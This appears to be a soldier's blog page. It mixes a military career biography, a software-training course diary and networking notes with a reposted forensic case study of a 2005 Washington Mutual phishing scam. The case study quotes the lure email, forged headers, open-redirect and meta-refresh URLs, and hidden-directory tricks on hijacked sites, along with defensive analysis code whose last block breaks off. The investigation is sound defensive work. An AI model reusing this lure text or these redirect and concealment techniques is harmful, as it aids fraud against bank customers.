Tuesday, 29 March 2022

The Joys and Sorrows of Being a Soldier

The joy is that we are taught togetherness, esprit de corps (jiwa korsa), responsibility and a maturity that you will not find in any other institution in Indonesia.

The sorrow is when a parent is ill and you cannot visit, and you can rarely join family moments because of the demands of duty and the distance when you are posted in Papua.

General Career

I attended primary school in Purworejo, graduating in 1999, then junior high school in 2002 and vocational high school (SMK) in 2005. After graduating from SMK I was accepted through the UMPTN at UNY and UNES; even before graduating I had already been accepted at three companies: PT AHM, PT ADM and PT Showa Indonesia Mfg. I decided to work at PT Astra Honda Motor in Cibitung, Bekasi, from 2005 to 2007, and after PT AHM I moved to PT Toyota Motor Manufacturing Indonesia in Karawang from 2007 to 2008. Later, while serving in the TNI, I continued my studies at Unmer Malang and graduated in 2013.

That is a brief account of my life's journey.

Military Career

I joined the army in 2008 and attended NCO (Bintara) training at Rindam IV/Diponegoro in Magelang, Central Java, graduating in 2009, then branch training at Pusdikarmed Cimahi. After completing branch training I joined Disinfolahta and was given the opportunity to attend Dikbator at Pusdik Pengmilum in 2009. After that course I was posted to Infolahtadam XVII/Cenderawasih in Jayapura, Papua. My day-to-day work at Infolahtadam XVII/Cen was as a computer and network technician for the Kodam XVII/Cen service area. I then attended Dikcapa in 2021 at Secapaad, followed by Dikcabpa Armed at Pusdikarmed, and on completing it I was posted to Pusdikarmed, where I hold the position of Dantonwal Denma Pusdikarmed, although my daily duties are in Penerangan (Public Information) Pusdikarmed.

Courses I have attended during my military career

Diktukba 2008

Dikcabba Armed 2009

Dikbator 2009

Dikbafourier 2010

Poltekad 2010-2013

Diklat Kamjarkom Kemhan 2014

Diklat Cyber Defense Kemhan 2018

Diklat Teknisi Komputer Kemhan 2019

Diktukpa 2021

Dikcabpa Armed 2021

various trainings and refresher courses at Disinfolahta, Mabesad, Mabes TNI and civilian institutions

JOYS AND SORROWS OF TAR PDE 2022

The joy of attending TAR PDE 2022 is, of course, meeting new people, friends from all corners of the Kotama and Balakpus across Indonesia; expanding one's network is the most important part, because wherever we are we will never be in difficulty when there is a friend we know. The sorrow is that I had to leave my wife and child, at a time when my child is at the age of loving to play, and my wife says that every day he waits for his father to come home, watching at the window.

Implementing TAR PDE 2022 in the unit

In practice, the TAR PDE 2022 application most likely to be implemented in the unit is improving the existing Google Form used for the surveys run by Jianbangdik and for the Binsat activities at Pusdikarmed Pussenarmed.

TAR PDE Results, TA 2022


1. Day one, Thursday 10 March 2022

At 10.00 WIB in the morning the opening was conducted by the Sesdis, Kolonel Arh Rikas Hidayattullah, S.E., M.M., followed by introductions of the instructors (gumil) and brief individual introductions, and then a pre-test.


2. Day two, Friday 11 March 2022

We all formed discussion groups, followed by ICT lessons from the instructor, starting with the history of ICT and its development, then the history of computers and their development up to the present day, followed by internet knowledge and a little IoT. We then produced an assignment, as a written piece or a presentation, on the definition of ICT, the origins of ICT, the development of ICT, computer components, the history of computers, the use of computers through the ages, and the concept of a computer system.


3. Day three, Monday 14 March 2022

Introduction to Microsoft Word, covering the menus and toolbar in Ms. Word and their meaning, followed by practical assignments: typing up the pre-test, converting the ICT presentation that had been delivered into Word form, and then writing up or re-typing a sprin (order letter) from a sample.


4. Day four, Tuesday 15 March 2022

The instructor introduced Ms. Excel, presenting the menus and toolbar, and then taught formulas in Ms. Excel, for example addition, subtraction, division and multiplication with different formulas: the sum or total formula =Sum(....), the average =Average(.....), the highest value =Max(....), the lowest value =Min(...), IF, and the arithmetic operators in Ms. Excel (-, +, *, /, %).


5. Day five, Wednesday 16 March 2022

The instructor taught Ms. PowerPoint: the menus and toolbar in Ms. PowerPoint, and how to open or jump to slides quickly by creating hyperlinks, giving each slide a hyperlink so that it is easier to find the slide we want to open or show. This ended with an assignment to create slides containing a biodata and links in the form of diagrams, charts, photos, videos, etc.


6. Day six, Thursday 17 March 2022

The instructor taught us the uses of Google Drive; those who did not yet have one were taught how to create a Google Drive and store files in it by first logging in to our own Gmail accounts, so that each of us can find our files from anywhere. The Google Drive assignment was to create a folder containing sub-folders for the material covered so far, and to upload all the materials and assignments completed into the folders created.


7. Day seven, Friday 18 March 2022

The instructor taught us the uses of Google Docs, a cloud computing service from Google in document form that can be accessed online. Here we were taught how to work as a team by sharing files with colleagues; all of us can apply this in our units to go paperless, and the work can be done anywhere as long as an internet connection is available.


8. Monday 21 March 2022

The instructor gave practice exercises on how to use Google Docs collaboratively, divided into teams as well as individually.


9. Tuesday 22 March 2022

The instructor gave practice exercises on how to use Google Slides collaboratively, divided into teams as well as individually. Google Slides itself is more multi-tasking in function.


10. Wednesday 23 March 2022

The instructor gave practice exercises on creating a Google Form, teaching how to create a survey and studying the menus within it.


11. Thursday 24 March 2022

The instructor gave practice exercises on creating a Mail Merge, teaching how to produce letters quickly using the mail merge menu, which can be connected to Ms. Excel.


12. Friday 25 March 2022

The instructor gave practice exercises on creating a flowchart, teaching how to draw a flowchart that follows the flow of the program we intend to write.


13. Monday 28 March 2022

The instructor gave practice exercises on creating a blog, teaching how to create a blog on a blogspot domain.


Monday, 28 March 2022

Computer Networks


Types of computer networks

1. PAN (Personal Area Network) This type of network covers a smaller area, for example an office or a home. It is usually used only for internet access and printers, and using a PAN does not require large resources.

2. LAN (Local Area Network) A LAN connects network devices within a relatively small range. Examples of LAN deployment are the networks in a school, an office or a home. Many people tend to use specific connectivity, especially token ring and ethernet. In addition, LAN also offers wireless networking technology using WiFi, better known as WLAN (Wireless Local Area Network).

3. CAN (Campus Area Network) A CAN can be said to be similar to a MAN, but is limited in scope to a campus or academic setting. This network is mostly used for lab practicals, email, class updates, and so on.

4. MAN (Metropolitan Area Network) A MAN is a network that connects one computer with others within the scope of a city on the same network. This type of network is larger than a LAN.

5. WAN (Wide Area Network) A WAN is a collection of geographically dispersed LANs. WANs tend to use technologies such as ATM, X.25 and Frame Relay for connectivity over even longer distances.

6. Internet The internet is the largest computer network ever created by humans. Its scope covers almost every corner of the world. Anyone can access a variety of information sources from many kinds of computing devices, such as PCs, smartphones, laptops, tablets, TVs, and so on.

7. VPN (Virtual Private Network) A VPN is one solution for providing a more secure internet connection. A VPN can create a secure path for data transmission. Today, many platforms sell VPNs, some for free and some with premium access.

Computer networks by transmission type

In terms of their fundamental form, computer networks are classified in two ways: by distance and by transmission.

Below are the two classifications of computer networks by transmission.

1. Broadcast A broadcast network is a single communication channel shared by several devices connected to the same network. A packet is a small message sent from one machine to another. The address field contains information about which machine the packet is intended for. If the packet is addressed to the machine itself, it is processed immediately; if the packet is addressed to another machine, the machine automatically ignores it.

2. Point-to-Point The second type, a point-to-point network, is made up of a number of individual pairwise connections from one device to another. To send a packet to its destination address it may need to pass through several intermediate machines, so it will often traverse many routes of possibly different lengths. For this reason, routing algorithms play a very important role in this kind of network.

Computer network topologies

1. Bus A bus topology has a single cable to which each workstation and server is connected. The advantage of a bus topology is that the network can be expanded and new workstations added without disturbing the other workstations. Its disadvantage is that if the cable is damaged or cut, the entire network is disrupted.

2. Ring A ring topology is formed when all devices are connected so as to resemble a ring or circle, so each workstation receives information passed from one device to the next. The advantage of a ring topology is that data collisions do not occur. Its disadvantage is that if one node has a problem, the entire network is disrupted.

3. Star In a star topology each workstation has its own path connected directly through a server or hub. The advantage of this topology is that if one workstation fails, the rest of the network is not affected, because each workstation has its own path or cable. The weakness of a star topology is its high cost, because it requires a lot of cabling.

4. Tree A tree topology is a combination of the star and bus topologies. This topology resembles the roots of a tree, in that only hub devices connect directly to the tree's bus, and each hub acts as the root of a tree. The advantages and disadvantages of a tree topology are the same as those of bus and star. However, this tree (hybrid) network supports better network expansion.

5. Mesh A mesh topology is often used when there must be absolutely no break in communication between nodes in a computer network. Devices are connected directly to one another as long as they are in the same network. The advantage of a mesh topology is faster communication between computers and better-assured security. Its disadvantage is the higher cost of providing the cabling.

Types of computer network devices

Many kinds of computer network devices have now been developed to assist and optimise the performance of network systems.

Below are some of the devices you will often encounter and use.

1. Server A server serves as the place or medium for storing information and managing the computer network. A server has higher specifications than a client, because the purpose of building a server is to serve client computers.

2. NIC (Network Interface Card) A NIC, also called a LAN card, is an expansion board used so that a computer can connect to a network. Ethernet comes in four varieties: ethernet (10 Mbit/s), fast ethernet (100 Mbit/s), gigabit ethernet (1000 Mbit/s) and ten-gigabit ethernet, "tengig" (10000 Mbit/s).

3. Network cable Cable is the medium that connects one device to another. Several kinds of cable are used to build network links, including coaxial, fibre optic and twisted pair.

4. Hub and switch A switch is a computer network device that connects several computers. Physically a switch looks the same as a hub, but logically a switch is equivalent to a bridge. Switches come in two types: unmanaged switches, the cheapest type, and managed switches, the most expensive type.

5. Router A router is a network device that connects a LAN into a WAN and manages the data traffic within it. A router can determine the best path because it has a routing table that records all the addresses in the network.

6. Bridge A bridge is a device used to forward traffic between network segments based on data-link information. A bridge can also divide a large network into several smaller networks.

7. Modem A modem is a device used to connect a computer to an internet service provider (ISP).

8. Repeater A repeater is a device that amplifies and regenerates incoming network signals. A repeater tries to preserve the integrity of the network signal. The weakness of a repeater is that it cannot filter traffic in the network.

9. Wireless card A wireless card is a device you must use if you want to connect to a wireless network. Most newer computers already come with hardware that supports a wireless card, but you can also add one to your computer yourself.


Source: https://mediaindonesia.com/teknologi/433330/jaringan-komputerpengertian-jenis-transmisi-dan-topologi

Friday, 25 March 2022

DIGITAL CONTROL SYSTEMS LABORATORY



TOPICS:

 

LAB 01 : Time Response of Systems

§  Show how the poles and zeros of a system's transfer function relate to its time-domain response.

§  Understand dominant poles

 

LAB 02 : System Identification

§  Identify the transfer function for a model of a system

§  Demonstrate the effects of non-linearity

§  Understand the process of system identification

 

LAB 03 : Sampling Time

§  Observe the effect of the sampling interval on the response

 

LAB 04 : Root Locus Analysis

§  Demonstrate the root locus concept applied to the identified system

§  Observe the effect of placing the controller in the forward vs. feedback path.

§  Evaluate potential proportional controllers.

 

LAB 05 : PID Controller Design for the System

§  Understand the effect of combining proportional, integral and derivative control.

 

LAB 06 : Compensator Design with Root Locus

§  Design a compensator for the identified system that yields a closed-loop system with the desired poles.

§  Observe the effect of compensator placement on the closed-loop dynamics.

Case Study 1: Tidball




This case study describes a pair of phishing attempts that took place in early 2005. For reasons that will become apparent, I refer to the individual, or group, responsible for the scam as Tidball.

1. The Initial Emails

It started out with an email, dated 29 January 2005, that appeared to be from Washington Mutual Bank and that included the following text.

We recently have determined that different computers have logged onto your Washington Mutual Bank Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by Feb 01, 2005, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner.

This looked like a typical phishing email and included a link to a fake Washington Mutual Bank page where I was encouraged to log in and then enter personal information such as my credit card number, date of birth, and so on.

The most interesting part of an email message like this is usually the URL of the fake bank site. But it is always worth perusing the text of the message and the headers for anything that looks unusual. Minor details can serve as signatures, and finding them elsewhere can create strong connections between seemingly unrelated scams.

The first email had several clues that I was able to make use of later on. The first clue lay at the start of the first sentence in the body of the email in the phrase "We recently have determined..." It can be dangerous for an author to comment on another's use of the English language, but this looked odd to me, so I made a note of it. Next I turned to the headers for the message:

    Return-Path: <support@wamu.com>
    Received: from web.mywebcompany.com (mywebcompany.com [64.239.179.50]
          by gateway.craic.com (8.11.6/8.11.6) with SMTP id j0TEAbl09958
          for <myemailaddr>; Sat, 29 Jan 2005 06:10:37 -0800
    Received: from vswz (21.221.56.17)
          by web.mywebcompany.com; Sat, 29 Jan 2005 06:10:38 -0800
    Date: Sat, 29 Jan 2005 06:10:38 -0800
    From: <support@wamu.com>
    X-Mailer: The Bat! (v2.01)
    Reply-To: <support@wamu.com>
    X-Priority: 3 (Normal)
    Message-ID: <35567962.20040419010559@wamu.com>
    To: <myemailaddr>
    Subject: Notification: Washington Mutual Bank
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
     boundary="----------50411716B3"

 

I described email headers in detail in Chapter 3, stressing how easily they can be forged. The one piece of data that can be relied on is the IP address in the first Received header line, which in this case is 64.239.179.50 and which reverse maps to mywebcompany.com. The form of the Message-ID and content boundary lines can sometimes serve as unique signatures, so they are worth noting for future use. In this example, the X-Mailer header was clearly unusual and worthy of some follow-up:

    X-Mailer: The Bat! (v2.01)

 

A Google search revealed that The Bat! is the name of a legitimate email client that runs on Windows systems and that is sold by a company based in the Republic of Moldova. It appears to have no connections to bulk mailing software. The name is very distinctive, and I had never heard of the software prior to this email, so I noted this header as a potential signature.

At this point, I moved on to the URL of the web site that was contained in the message. But before I describe where that path led to, I want to introduce the second example of this scam. By discussing both of them in parallel, I can better illustrate the discovery process.

The second email was dated 14 February 2005 and was received from the same IP address as the first:

    Return-Path: <security@wamu.com>
    Received: from web.mywebcompany.com (mywebcompany.com [64.239.179.50]
          by gateway.craic.com (8.11.6/8.11.6) with SMTP id j1ED9Kl08865
          for <myemailaddr>; Mon, 14 Feb 2005 05:09:20 -0800
    Received: from chlzgm (160.136.116.228)
          by web.mywebcompany.com; Mon, 14 Feb 2005 05:09:20 -0800
    Date: Mon, 14 Feb 2005 05:09:20 -0800
    From: <security@wamu.com>
    X-Mailer: The Bat! (v2.01)
    Reply-To: <security@wamu.com>
    X-Priority: 3 (Normal)
    Message-ID: <224921472.20040416151929@wamu.com>
    To: <myemailaddr>
    Subject: Washington Mutual Bank
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
     boundary="----------2A73EC7EC927"

 

The second Received header lines were different between the messages, as were the Message-ID and content boundary headers. This is not a surprise, since these are routinely forged in spam messages. However, the X-Mailer header referred to the same distinctive software as the first message.

The body of the message was largely identical with the exception of the cutoff date, by which I was supposed to update my account and the URL of the target web site.
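The header comparison described above, as an added example (not code from the book): it pulls out the one field the text treats as trustworthy, the IP in the first Received header written by our own gateway, alongside the forgeable but distinctive fields (X-Mailer, Message-ID, MIME boundary), and reports which of them the two messages share. The two header sets are constructed copies of the headers quoted above; everything else is standard-library parsing.

```python
"""Extract signature fields from phishing email headers and compare two
messages. Added example for this page; MSG1 and MSG2 are constructed from
the headers quoted in the case study."""
import re
from email.parser import HeaderParser

MSG1 = """\
Return-Path: <support@wamu.com>
Received: from web.mywebcompany.com (mywebcompany.com [64.239.179.50])
        by gateway.craic.com (8.11.6/8.11.6) with SMTP id j0TEAbl09958
        for <myemailaddr>; Sat, 29 Jan 2005 06:10:37 -0800
Received: from vswz (21.221.56.17)
        by web.mywebcompany.com; Sat, 29 Jan 2005 06:10:38 -0800
Date: Sat, 29 Jan 2005 06:10:38 -0800
From: <support@wamu.com>
X-Mailer: The Bat! (v2.01)
Reply-To: <support@wamu.com>
X-Priority: 3 (Normal)
Message-ID: <35567962.20040419010559@wamu.com>
To: <myemailaddr>
Subject: Notification: Washington Mutual Bank
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----------50411716B3"
"""

MSG2 = """\
Return-Path: <security@wamu.com>
Received: from web.mywebcompany.com (mywebcompany.com [64.239.179.50])
        by gateway.craic.com (8.11.6/8.11.6) with SMTP id j1ED9Kl08865
        for <myemailaddr>; Mon, 14 Feb 2005 05:09:20 -0800
Received: from chlzgm (160.136.116.228)
        by web.mywebcompany.com; Mon, 14 Feb 2005 05:09:20 -0800
Date: Mon, 14 Feb 2005 05:09:20 -0800
From: <security@wamu.com>
X-Mailer: The Bat! (v2.01)
Reply-To: <security@wamu.com>
X-Priority: 3 (Normal)
Message-ID: <224921472.20040416151929@wamu.com>
To: <myemailaddr>
Subject: Washington Mutual Bank
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----------2A73EC7EC927"
"""

# An IPv4 address written inside [...] or (...) in a Received header.
IP_RE = re.compile(r"[\[(](\d{1,3}(?:\.\d{1,3}){3})[\])]")

# Fields worth recording as potential signatures across messages.
SIGNATURE_FIELDS = ("first_hop_ip", "x_mailer", "message_id", "boundary", "from")


def parse_headers(raw):
    """Return the signature fields of one message's headers."""
    msg = HeaderParser().parsestr(raw)
    received = msg.get_all("Received") or []
    # Each hop prepends its own Received header, so the first one was written
    # by our gateway; every later Received line could have been forged.
    first_hop = IP_RE.search(received[0]) if received else None
    return {
        "first_hop_ip": first_hop.group(1) if first_hop else None,
        "claimed_ips": [m.group(1) for r in received[1:] for m in IP_RE.finditer(r)],
        "x_mailer": msg.get("X-Mailer"),
        "message_id": msg.get("Message-ID"),
        "boundary": msg.get_boundary(),
        "from": msg.get("From"),
    }


def shared_signatures(raw_a, raw_b):
    """Fields that are present and identical in both messages."""
    a, b = parse_headers(raw_a), parse_headers(raw_b)
    return {k: a[k] for k in SIGNATURE_FIELDS if a[k] is not None and a[k] == b[k]}


if __name__ == "__main__":
    for name, raw in (("first", MSG1), ("second", MSG2)):
        print(name, parse_headers(raw))
    print("shared:", shared_signatures(MSG1, MSG2))
```

For the two messages the shared fields come out as the gateway-observed IP and the X-Mailer string, while From, Message-ID and boundary differ, which is exactly the pattern the text describes: the forgeable fields vary per message and the two that do not are the ones worth keeping as a signature.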

2. The Initial URLs

The URLs included in the emails point to two different sites. As I will describe, all the sites that are involved in the scam appear to have been hijacked by Tidball. To protect these innocent bystanders, I have modified their IP addresses and domain names in the examples that follow. In place of the IP address 10.0.0.1, for example, you will see 10.0.x.x.

The URL given in the first email was:

http://64.157.x.x/csBanner/banners/realstat.php?PROGID=stat3214&MAILID=73&MakeCopy=0&GetCopy=0&GROUPID=261&EMAILADDR=noaddr&REDIRURL=http://216.130.x.x/cgi-bin/sblogin/receive.pl

The second message contained a link to this URL:

http://66.70.x.x/stat/realstat.php?PROGID=stat3214&MAILID=73&MakeCopy=0&GetCopy=0&GROUPID=261&EMAILADDR=noaddr&REDIRURL=http://216.242.x.x/_notes/text7.htm.mno

These illustrate an important point when you are investigating a scam or looking at the structure of a web site. It is easy to get sidetracked by interesting details before you have taken in the big picture. These two URLs are full of information, and I will return to them shortly, but the first priority is to visit the site that they lead you to. In the world of traditional forensics this would be like fixating on a tire track when the car itself has been abandoned just around the corner.

But at the same time, you must not forget all those interesting details that you encounter along the way. Make sure you take plenty of notes so that you can revisit them later on. In some cases, the amount and diversity of information that you uncover can be overwhelming, but small details can turn out to be very significant.

These two URLs took me to a fake Washington Mutual Bank home page, located on two different sites. But neither of these final URLs matched the original ones, so clearly there was some form of redirection going on. Both copies of the bank site looked identical, which suggested a common point between the two paths being followed by these scams. That looked like a good break point at which to revisit the original URLs and to understand the redirection mechanism that was being used.

3. Redirection

Stripping off the CGI parameters from the original URLs makes them easier to understand:

They both invoke a PHP script called realstat.php that redirects visitors to a second URL. The script takes five parameters: PROGID, MAILID, MakeCopy, GetCopy, GROUPID, EMAILADDR, and REDIRURL. The values passed to these are identical in both examples, with the exception of REDIRURL, which has two different URLs for its values.

Given a name and a bit of context, you can often make an educated guess about the function of a program or parameter because developers typically choose names that are indicative of their function. It's just easier that way. A reasonable guess is that realstat.php was involved in tracking visitors to web sites. Searching for the script name on Google turns up a few hits, some to other scams in this series, but none to pages that describe its origin and function.

Clues to that may lie in the directory in which the script resides. So it is always worth truncating URLs back to the directory name and seeing if the server returns a listing of its contents. That was the case with both of these sites. Figure 11-1 shows a listing equivalent to these. This was actually taken from another example of the scam as I failed to save listings from the original sites, but the contents are almost identical.

The directory contains two PHP scripts and several log files, all with "3214" in their names. I can see that realstat.php is a small script, less than 2 Kbytes, but I cannot access its source code. However, I can look at those log files and see that they contain many lines like this:

    73:L    261    noaddr

 

Figure 1. Listing of a directory that contains realstat.php

 

This is not very informative in itself but the pieces of information match exactly with the parameters passed to the script in the original URLs. The parameter PROGID was set to stat3214, which shows up in the log file names. MAILID is set to 73, GROUPID is set to 261, and EMAILADDR is set to noaddr, all of which show up in the log file records. This suggests to me that realstat.php is a legitimate script that is used to track visitors to a web site or perhaps track response to some form of email campaign. The script logs the information and then redirects visitors to the target page that they want to visit.

Tidball has discovered the redirect feature and has performed some form of search looking to find sites that make the script available. Alternatively the sites may have been broken into and the script put in place. Either way, owners of these sites were probably unaware of the vulnerability.

The rationale behind using the script is presumably to confuse spam filters that might register the original URLs. It certainly doesn't do much to obscure the redirection as the target URLs are included right there as parameters to the script:

But these were not the URLs of the final fake bank pages, so there was another redirection step involved. Visiting either of these in a browser took me to the fake pages, so that did nothing to uncover the mechanism that was being used. This is where wget is really useful, using the -S option to capture the HTTP headers. Here are those for the first of the two examples, with some headers removed for the sake of readability:

    http://64.157.x.x/csBanner/banners/realstat.php?PROGID=stat3214&
    MAILID=73&MakeCopy=0&GetCopy=0&GROUPID=261&EMAILADDR=noaddr&
    REDIRURL=http://216.130.x.x/cgi-bin/sblogin/receive.pl
    [...]
     1 HTTP/1.1 302 Found
     2 Date: Sat, 29 Jan 2005 19:03:59 GMT
     3 Server: Apache/1.3.33 (Unix) PHP/4.3.9
     4 X-Powered-By: PHP/4.3.9
     5 Location: http://216.130.x.x/cgi-bin/sblogin/receive.pl
    [...]
     1 HTTP/1.1 302 Found
     2 Date: Sat, 29 Jan 2005 19:08:04 GMT
     3 Server: Apache/1.3.26 (Unix) PHP/4.3.10
     4 Location: http://64.157.x.x/autorank/images/.../template/logon.htm
    [...]
     1 HTTP/1.1 200 OK
     2 Date: Sat, 29 Jan 2005 19:03:59 GMT
     3 Server: Apache/1.3.33 (Unix) PHP/4.3.9
    [...]
    10 Content-Type: text/html
    [...]
    11:04:00 (65.90 KB/s) - `logon.htm' saved [27755/27755]

 

Before editing, header logs like these can be quite confusing. Look for the HTTP/1.1 lines that always come first in each block of headers. This example has three distinct blocks. The first is the response from the site that contains realstat.php in the original URL. The 302 code in the first header shows that I am being redirected. The X-Powered-By line confirms that a PHP script is responsible for this, and the Location header tells me where I am headed.

The second block is the response from 216.130.x.x, and its 302 code tells me that I am again being redirected. Its URL suggests that it is a Perl script. The Location header again tells me where I am being redirected to. In this case, it defines an HTML page on 64.157.x.x, which is the same server that I originally came from!

This would seem to be a pointless cycle of redirection, especially since some effort has been required to set up redirection on 216.130.x.x. This may have been done for the sake of obfuscation, or it may give Tidball the flexibility to redirect browsers to alternative sites as the initial ones are taken down, once the scams are uncovered.

The redirection in the second example is slightly different. At face value, text7.htm.mno looks like a note file created by Macromedia Dreamweaver. In fact it contains nothing but the following text:

    <META http-equiv="refresh" content=" 0;

    url=http://66.230.x.x/socal/party3_5/template/logon.htm">

 

A tag like this would normally be found within the HEAD block of a regular HTML file, where it serves to redirect any browser to the new URL. Using the tag by itself works with Internet Explorer and Safari, but not with Firefox. Unlike the first example, this redirection takes you to a different site.

While the use of realstat.php may represent the simple hijacking of a script that was already in place, the second redirection step required Tidball to access both sites and insert files that contained the target URLs.
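The whole of section 3 as one added example (not the book's code): it splits the tracker URLs into script name and parameters, flags the open-redirect condition that makes a script like realstat.php useful to a scammer (an absolute REDIRURL pointing at another host), then rebuilds the hop list from a captured wget -S transcript and from a meta-refresh body, and finally checks the observation made above that the first chain ends on the host it started from. The URLs, the transcript and the meta-refresh body are constructed copies of what the text quotes, with the x.x placeholders kept.

```python
"""Reconstruct a phishing redirect chain from captured artefacts. Added
example for this page; URL1, URL2, WGET_LOG and META_BODY are constructed
from the values quoted in the case study."""
import re
from urllib.parse import urlsplit, parse_qsl

URL1 = ("http://64.157.x.x/csBanner/banners/realstat.php?PROGID=stat3214&MAILID=73"
        "&MakeCopy=0&GetCopy=0&GROUPID=261&EMAILADDR=noaddr"
        "&REDIRURL=http://216.130.x.x/cgi-bin/sblogin/receive.pl")
URL2 = ("http://66.70.x.x/stat/realstat.php?PROGID=stat3214&MAILID=73"
        "&MakeCopy=0&GetCopy=0&GROUPID=261&EMAILADDR=noaddr"
        "&REDIRURL=http://216.242.x.x/_notes/text7.htm.mno")

# wget -S output for the first example; the leading numbers are wget's own
# header line numbers, as shown in the text.
WGET_LOG = """\
 1 HTTP/1.1 302 Found
 2 Date: Sat, 29 Jan 2005 19:03:59 GMT
 3 Server: Apache/1.3.33 (Unix) PHP/4.3.9
 4 X-Powered-By: PHP/4.3.9
 5 Location: http://216.130.x.x/cgi-bin/sblogin/receive.pl
 1 HTTP/1.1 302 Found
 2 Date: Sat, 29 Jan 2005 19:08:04 GMT
 3 Server: Apache/1.3.26 (Unix) PHP/4.3.10
 4 Location: http://64.157.x.x/autorank/images/.../template/logon.htm
 1 HTTP/1.1 200 OK
 2 Date: Sat, 29 Jan 2005 19:03:59 GMT
 3 Server: Apache/1.3.33 (Unix) PHP/4.3.9
10 Content-Type: text/html
"""

# Entire content of text7.htm.mno in the second example.
META_BODY = ('<META http-equiv="refresh" content=" 0;\n'
             'url=http://66.230.x.x/socal/party3_5/template/logon.htm">')

REDIRECT_CODES = {301, 302, 303, 307, 308}


def tracker_params(url):
    """Split a tracker URL into host, script name and query parameters."""
    parts = urlsplit(url)
    return {"host": parts.hostname,
            "script": parts.path.rsplit("/", 1)[-1],
            "params": dict(parse_qsl(parts.query))}


def is_open_redirect(url):
    """True when REDIRURL is an absolute URL on a host other than the script's
    own: the script will forward a visitor anywhere the link author chooses."""
    info = tracker_params(url)
    target = urlsplit(info["params"].get("REDIRURL", "")).hostname
    return target is not None and target != info["host"]


def parse_wget_headers(log):
    """Group a wget -S transcript into (status, headers) per response block,
    stripping wget's line numbers; a block starts at each HTTP/ status line."""
    blocks = []
    for raw in log.splitlines():
        line = re.sub(r"^\s*\d+\s", "", raw).strip()
        if line.startswith("HTTP/"):
            blocks.append((int(line.split()[1]), {}))
        elif ":" in line and blocks:
            name, value = line.split(":", 1)
            blocks[-1][1][name.strip().lower()] = value.strip()
    return blocks


def meta_refresh_target(body):
    """Pull url= out of a <META http-equiv="refresh"> tag, tolerating the
    stray whitespace and line break seen in the captured file."""
    m = re.search(r'http-equiv="refresh"\s+content="[^"]*?url=([^"\s]+)"', body, re.I)
    return m.group(1) if m else None


def redirect_chain(start_url, log, body=None):
    """Ordered hops: start URL, each Location from a 3xx block, then a meta
    refresh target if the final page carries one."""
    chain = [start_url]
    for status, headers in parse_wget_headers(log):
        if status in REDIRECT_CODES and "location" in headers:
            chain.append(headers["location"])
    target = meta_refresh_target(body) if body else None
    if target:
        chain.append(target)
    return chain


def returns_to_origin(chain):
    """Does the chain finish on the same host it started from?"""
    return urlsplit(chain[0]).hostname == urlsplit(chain[-1]).hostname


if __name__ == "__main__":
    for hop in redirect_chain(URL1, WGET_LOG):
        print(hop)
    print("back to origin:", returns_to_origin(redirect_chain(URL1, WGET_LOG)))
    print(redirect_chain(URL2, "", META_BODY))
```

Run against the first example the chain has three hops and returns_to_origin is true, matching the "pointless cycle" remark above; against the second, the only hop after the tracker is the meta-refresh target on a different host. On a site you operate, is_open_redirect applied to your own tracking or click-counting URLs is the quick check for the weakness Tidball relied on; the fix is to reject absolute REDIRURL values for other hosts or to look the target up from an allow-list by id.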

4. The Web Sites

The two fake bank web sites that I was redirected to were identical. The initial page asked me to log in to my account at the bank. Submitting a fake username and password returned a second page that asked for a broader range of data such as date of birth and credit card number. Submitting that page, with fake data of course, took me to the real bank site. That is how a typical phishing site operates and in itself is not particularly interesting. More of a challenge is figuring out where the site is located and, if you are lucky, learning something about its structure and operation.

Here are the URLs of the two sites:

You can learn something from a single piece of data, but being able to compare two different examples can tell you so much more. That is the case here. Both URLs point to the same file, logon.htm, and I know from visiting the sites that these appear to be identical. The directories that contain the files also share the same name, template, but the preceding parts of the URLs are totally different. Not only that but the first site places the template directory four levels down from the document root, whereas the second example places it three levels down. If the site were set up to run this specific scam, then you would expect the login page to be in a top-level directory, not buried deep within the site.

These details suggest that the sites have been broken into by Tidball, with the fake bank sites being set up surreptitiously.

5. Directories

Given the multiple levels of directories involved in the two sites, an obvious next step was to see if the servers would provide listings for any of the directories and indeed they did.

Both host web sites, into which the phishing sites had been inserted, turned out to be pornography sites; I will spare you the details of those. In both sites, one of the directories in the path contained a large number of thumbnail images. A copy of the template directory had been placed into these in such a way as to not attract attention from the operator of the site if they were to casually look at the listing, either from the Web or from a Unix shell on the server itself.

Although I do not frequent this type of web site, I understand that many of them buy sets of images, along with the software to manage and display them, from companies that cater to this lucrative market. Tidball found a way to break into these sites by exploiting some vulnerability in this software. In fact, I believe I know exactly how this was achieved. A Google search with the appropriate query term leads to a detailed description of the exploit. I won't broadcast that any further here.

The choice of a directory with a large number of files makes good sense if you want your directory to remain unnoticed. In the 64.157.x.x example, a directory called ... had been inserted into the images directory. This unusual name was chosen because it will not appear in server directory listings or in a basic Unix shell listing from the command ls. This is the case for any directory that begins with a period, although these are revealed by ls -a.

In the 66.230.x.x example, a directory called party3_5 was placed into the directory socal, which contained a large number of images with names such as party3_4.jpg, party3_6.jpg, and so on. So the name would blend into the background in a quick glance at the directory listing. This concealment of directory names adds weight to the idea that the sites had been attacked and compromised by Tidball.

Although the name of directory ... is hidden in the server listing of the images directory that contains it, its contents could be viewed from the URL http://64.157.x.x/autorank/images/.../. I used that example in Chapter 5 and the listing is shown in Figure 5-6. This was one of the fortunate instances where the scammer has left behind a file called template.tar, containing all the files that are used to create the fake site.

Leaving behind a file like this was a major mistake on the part of Tidball. The error was repeated on the second phishing site, allowing me to retrieve two versions that I could then compare. The contents proved to be most revealing.
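The two concealment tricks described in this section (a dot-prefixed directory that plain ls and server listings skip, and a directory whose name mimics its neighbours) are exactly what an operator auditing a web root should look for. The following added example, which is not part of the original study, builds a constructed directory tree that mirrors the two layouts and walks it looking for those patterns, plus leftover archives and login pages buried deep in the tree; the file names and thresholds are my own choices.

```python
import os
import re
import tempfile
from pathlib import Path

def build_sample_tree(root):
    """Constructed web root mirroring the two layouts described above (not the
    real hosts): a '...' directory among thumbnails with a leftover template.tar,
    and a 'party3_5' directory sitting among party3_N.jpg files."""
    images = Path(root, "autorank", "images")
    images.mkdir(parents=True)
    for i in range(1, 6):
        (images / f"thumb{i:03d}.jpg").write_bytes(b"")
    (images / "..." / "template").mkdir(parents=True)
    (images / "..." / "template" / "logon.htm").write_text("")
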